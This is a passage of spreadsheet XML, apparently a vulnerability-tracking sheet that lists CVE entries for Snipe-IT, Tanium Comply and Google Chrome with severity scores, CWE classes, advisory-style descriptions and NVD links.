        </is>
      </c>
      <c r="S321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85091</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86750</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr"/>
      <c r="Q322" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions &lt;= 8.6.3 (fixed in 8.7.0) do not validate company assignment authorization before persisting user records via the REST API. In Api\UsersController::store() and ::update(), the user record is filled from the request and saved before the requested company_id / company_ids[] values are filtered against the actor's permitted companies (Company::getIdsForCurrentUser()). On installs using Full Multiple Companies Support (FMCS), a non-superuser holding users.create (or users.edit on a target user) can submit company identifiers for companies outside their scope — including a mix of permitted and foreign ids — causing the account row to be committed to the database before authorization is checked. Where null_company_is_floater=1 is set, the post-hoc filter leaves an empty company pivot and the account is persisted as a "floater" with cross-company visibility, allowing creation or relocation of user accounts across tenant boundaries.</t>
        </is>
      </c>
      <c r="S322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86750</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86771</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr"/>
      <c r="Q323" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 fail to HTML-escape the employee_num field in the acceptance PDF generator, allowing attackers with users.edit permission to inject img tags into TCPDF's writeHTML() function. Attackers can craft a malicious employee_num value containing an img tag with an arbitrary HTTP(S) URL to trigger server-side requests to internal services, cloud metadata endpoints, or external targets when a victim signs an asset acceptance.</t>
        </is>
      </c>
      <c r="S323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86771</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87034</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr"/>
      <c r="K324" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr"/>
      <c r="Q324" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a SQL injection vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87034</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87479</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr"/>
      <c r="K325" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr"/>
      <c r="Q325" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>Insufficient policy enforcement in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87479</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87480</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr"/>
      <c r="K326" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr"/>
      <c r="Q326" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>Use after free in Printing in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87480</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87481</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr"/>
      <c r="K327" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr"/>
      <c r="Q327" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87481</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87487</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr"/>
      <c r="K328" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr"/>
      <c r="Q328" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87487</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87506</t>
        </is>
      </c>
      <c r="D329" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E329" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F329" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G329" s="5" t="inlineStr"/>
      <c r="H329" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I329" s="5" t="inlineStr"/>
      <c r="J329" s="5" t="inlineStr"/>
      <c r="K329" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L329" s="5" t="inlineStr"/>
      <c r="M329" s="5" t="inlineStr"/>
      <c r="N329" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O329" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P329" s="5" t="inlineStr"/>
      <c r="Q329" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="R329" s="5" t="inlineStr">
        <is>
          <t>Privilege elevation in WebUI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S329" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87506</t>
        </is>
      </c>
    </row>
    <row r="330">
      <c r="A330" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B330" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C330" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87510</t>
        </is>
      </c>
      <c r="D330" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E330" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F330" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G330" s="5" t="inlineStr"/>
      <c r="H330" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I330" s="5" t="inlineStr"/>
      <c r="J330" s="5" t="inlineStr"/>
      <c r="K330" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L330" s="5" t="inlineStr"/>
      <c r="M330" s="5" t="inlineStr"/>
      <c r="N330" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O330" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P330" s="5" t="inlineStr"/>
      <c r="Q330" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R330" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in FileAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87510</t>
        </is>
      </c>
    </row>
    <row r="331">
      <c r="A331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B331" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87524</t>
        </is>
      </c>
      <c r="D331" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F331" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr"/>
      <c r="Q331" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>Use after free in Core in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87524</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87553</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr"/>
      <c r="Q332" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87553</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87572</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr"/>
      <c r="Q333" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>Injection in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87572</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87578</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr"/>
      <c r="Q334" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>Use after free in Receiver in Google Chrome prior to 153.0.8010.36 allowed an adjacent attacker to execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87578</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87582</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr"/>
      <c r="Q335" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>Confused deputy in DataTransfer in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87582</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87604</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr"/>
      <c r="Q336" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87604</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87616</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr"/>
      <c r="Q337" s="5" t="inlineStr">
        <is>
          <t>CWE-665</t>
        </is>
      </c>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>Improper initialization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S337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87616</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87618</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
